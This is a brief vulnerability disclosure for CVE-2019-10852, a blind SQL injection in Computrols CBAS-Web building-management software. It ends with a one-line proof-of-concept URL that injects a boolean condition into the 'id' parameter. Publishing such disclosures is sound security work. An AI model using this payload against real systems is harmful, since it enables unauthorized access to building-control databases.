Computrols CBAS-Web versions 19.0.0 and below suffer from a remote blind SQL injection vulnerability.
640f8db598a83f5700d896d5ef44f45f
Computrols CBAS-Web Authenticated Boolean-based Blind SQL Injection
Affected versions: 19.0.0 and below
CVE: CVE-2019-10852
Advisory: https://applied-risk.com/resources/ar-2019-009
Paper: https://applied-risk.com/resources/i-own-your-building-management-system
by Gjoko 'LiquidWorm' Krstic
PoC (id param):
http://192.168.1.250/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510=2510